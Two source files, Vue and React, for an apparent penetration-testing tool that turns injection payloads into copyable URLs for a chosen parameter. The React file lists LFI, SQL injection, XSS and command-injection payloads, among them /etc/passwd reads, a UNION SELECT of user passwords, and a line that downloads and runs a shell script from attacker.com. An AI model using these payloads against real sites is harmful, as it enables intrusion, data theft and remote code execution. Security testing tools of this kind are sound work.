// src/components/UrlParameterInjection.vue
<script setup lang="ts">
import { ref } from 'vue'
import { urlPayloads } from '@/lib/payloads'

const baseUrl = ref('http://example.com/page.php')
const parameter = ref('id')
const copied = ref<string | null>(null)
const activeTab = ref('lfi')

function generateUrl(payload: string) {
  try {
    const url = new URL(baseUrl.value)
    url.searchParams.set(parameter.value, payload)
    return url.toString()
  } catch {
    return `${baseUrl.value}?${parameter.value}=${encodeURIComponent(payload)}`
  }
}

async function copyToClipboard(text: string, id: string) {
  try {
    await navigator.clipboard.writeText(text)
    copied.value = id
    setTimeout(() => { copied.value = null }, 2000)
  } catch { /* ignore */ }
}
</script>

<template>
  <div class="card w-full p-6 space-y-6">
    <div class="space-y-1">
      <h1 class="text-2xl font-800 text-link">URL Parameter Injection</h1>
      <p class="text-sm text-neutral-400">Generate URLs with various injection payloads for testing</p>
    </div>

    <div class="grid grid-cols-2 gap-4">
      <div class="space-y-2 md:col-span-2">
        <label for="baseUrl" class="text-sm text-main">Base URL</label>
        <input id="baseUrl" v-model="baseUrl" type="text" placeholder="http://example.com/page.php" class="input" />
      </div>
      <div class="space-y-2 md:col-span-2">
        <label for="parameter" class="text-sm text-main">Parameter Name</label>
        <input id="parameter" v-model="parameter" type="text" placeholder="id" class="input" />
      </div>
    </div>

    <div class="flex gap-2 border-b border-neutral-700/50 pb-2">
      <button
        v-for="key in Object.keys(urlPayloads)"
        :key="key"
        @click="activeTab = key"
        :class="[
          'px-3 py-1.5 text-sm rd-1 transition-all duration-200 cursor-pointer decoration-none border-none',
          activeTab === key
            ? 'text-link op-100 bg-neutral-700/30'
            : 'text-link op-60 hover:op-100'
        ]"
      >
        {{ key.toUpperCase() }}
      </button>
    </div>

    <div v-for="(list, key) in urlPayloads" :key="key" v-show="activeTab === key" class="space-y-3">
      <div v-for="(payload, index) in list" :key="index" class="relative">
        <div class="bg-hex-161b22 rd-1 p-3 pr-10">
          <div class="text-xs text-neutral-500 mb-1 font-mono">Payload: {{ payload }}</div>
          <div class="text-sm font-mono whitespace-pre-wrap break-all text-neutral-300">{{ generateUrl(payload) }}</div>
        </div>
        <button
          @click="copyToClipboard(generateUrl(payload), `${key}-${index}`)"
          class="absolute top-2 right-2 btn-ghost h-7 w-7 p-0"
        >
          <i v-if="copied === `${key}-${index}`" class="i-mdi-check text-green-500" />
          <i v-else class="i-mdi-content-copy" />
        </button>
      </div>
    </div>
  </div>
</template>

// src/components/UrlParameterInjection.tsx
import { useState } from "react";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { Label } from "@/components/ui/label";
import { Card, CardContent, CardDescription, CardHeader, CardTitle } from "@/components/ui/card";
import { Tabs, TabsContent, TabsList, TabsTrigger } from "@/components/ui/tabs";
import { Copy, Check } from "lucide-react";

export function UrlParameterInjection() {
  const [baseUrl, setBaseUrl] = useState("http://example.com/page.php");
  const [parameter, setParameter] = useState("id");
  const [copied, setCopied] = useState<string | null>(null);

  const payloads = {
    lfi: [
      "../../../etc/passwd",
      "....//....//....//etc/passwd",
      "..%2F..%2F..%2Fetc%2Fpasswd",
      "../../../../../../etc/passwd%00",
      "php://filter/convert.base64-encode/resource=index.php",
    ],
    sqli: [
      "1' OR '1'='1",
      "1' OR 1=1--",
      "1' UNION SELECT NULL,NULL,NULL--",
      "1' AND 1=2 UNION SELECT username,password FROM users--",
      "' OR 'x'='x",
    ],
    xss: [
      "<script>alert('XSS')</script>",
      "<img src=x onerror=alert('XSS')>",
      "<svg/onload=alert('XSS')>",
      "javascript:alert('XSS')",
      "\"><script>alert(String.fromCharCode(88,83,83))</script>",
    ],
    rce: [
      "; ls -la",
      "| cat /etc/passwd",
      "`whoami`",
      "$(cat /etc/passwd)",
      "; wget http://attacker.com/shell.sh -O /tmp/shell.sh; bash /tmp/shell.sh",
    ],
  };

  const generateUrl = (payload: string) => {
    try {
      const url = new URL(baseUrl);
      url.searchParams.set(parameter, payload);
      return url.toString();
    } catch {
      return `${baseUrl}?${parameter}=${encodeURIComponent(payload)}`;
    }
  };

  const copyToClipboard = async (text: string, id: string) => {
    try {
      await navigator.clipboard.writeText(text);
      setCopied(id);
      setTimeout(() => setCopied(null), 2000);
    } catch (err) {
      console.error("Failed to copy:", err);
    }
  };

  return (
    <Card className="w-full max-w-4xl">
      <CardHeader>
        <CardTitle>URL Parameter Injection</CardTitle>
        <CardDescription>
          Generate URLs with various injection payloads for testing
        </CardDescription>
      </CardHeader>
      <CardContent className="space-y-6">
        <div className="grid grid-cols-1 md:grid-cols-2 gap-4">
          <div className="space-y-2 md:col-span-2">
            <Label htmlFor="baseUrl">Base URL</Label>
            <Input
              id="baseUrl"
              placeholder="http://example.com/page.php"
              value={baseUrl}
              onChange={(e) => setBaseUrl(e.target.value)}
            />
          </div>
          <div className="space-y-2 md:col-span-2">
            <Label htmlFor="parameter">Parameter Name</Label>
            <Input
              id="parameter"
              placeholder="id"
              value={parameter}
              onChange={(e) => setParameter(e.target.value)}
            />
          </div>
        </div>

        <Tabs defaultValue="lfi" className="w-full">
          <TabsList className="grid w-full grid-cols-4">
            <TabsTrigger value="lfi">LFI</TabsTrigger>
            <TabsTrigger value="sqli">SQLi</TabsTrigger>
            <TabsTrigger value="xss">XSS</TabsTrigger>
            <TabsTrigger value="rce">RCE</TabsTrigger>
          </TabsList>

          {Object.entries(payloads).map(([key, payloadList]) => (
            <TabsContent key={key} value={key} className="space-y-3">
              {payloadList.map((payload, index) => {
                const fullUrl = generateUrl(payload);
                const id = `${key}-${index}`;
                return (
                  <div key={index} className="relative">
                    <div className="bg-muted p-3 rounded-lg pr-12">
                      <div className="text-xs text-muted-foreground mb-1 font-mono">
                        Payload: {payload}
                      </div>
                      <div className="text-sm font-mono whitespace-pre-wrap break-all">
                        {fullUrl}
                      </div>
                    </div>
                    <Button
                      size="icon-sm"
                      variant="ghost"
                      className="absolute top-2 right-2"
                      onClick={() => copyToClipboard(fullUrl, id)}
                    >
                      {copied === id ? (
                        <Check className="h-4 w-4 text-green-500" />
                      ) : (
                        <Copy className="h-4 w-4" />
                      )}
                    </Button>
                  </div>
                );
              })}
            </TabsContent>
          ))}
        </Tabs>
      </CardContent>
    </Card>
  );
}
